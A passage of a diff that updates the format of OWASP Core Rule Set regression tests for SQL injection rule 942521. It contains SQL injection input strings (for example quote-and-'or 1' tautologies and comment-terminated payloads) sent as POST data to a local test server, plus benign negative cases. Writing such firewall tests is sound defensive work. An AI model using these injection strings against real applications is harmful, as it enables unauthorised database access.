text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'and%20id%20is%20not?--" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 5 desc: "False-positve: is it your parents' or yours" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=it%20is%20your%20parents'%20and%20yours" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=it%20is%20your%20parents'%20and%20yours" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 6 desc: "Negative test: bob's or alice's" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=bob's%20or%20alice's" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=bob's%20or%20alice's" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 7 desc: "Negative test: mother or daugher" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=mother%20or%20daughter" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=mother%20or%20daughter" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 8 desc: "Negative test: 'oreo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='oreo" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='oreo" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 9 desc: "Negative test: 'fork" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='fork" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='fork" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 10 desc: "Negative test: 'for" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='%20for" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='%20for" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 11 desc: "Negative test: ''or" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 12 desc: "Negative test: 'books' or 'applles'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 13 desc: "Negative test: bob's presentation's 'or'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 14 desc: "Bypass with '''or 1" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='''or%201" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='''or%201" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 15 desc: "False-negative: Not detected with escapes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C'lol'%20or%20'1" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C'lol'%20or%20'1" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 16 desc: "Negative test: Wikipedia article about SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 17 desc: "Performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%4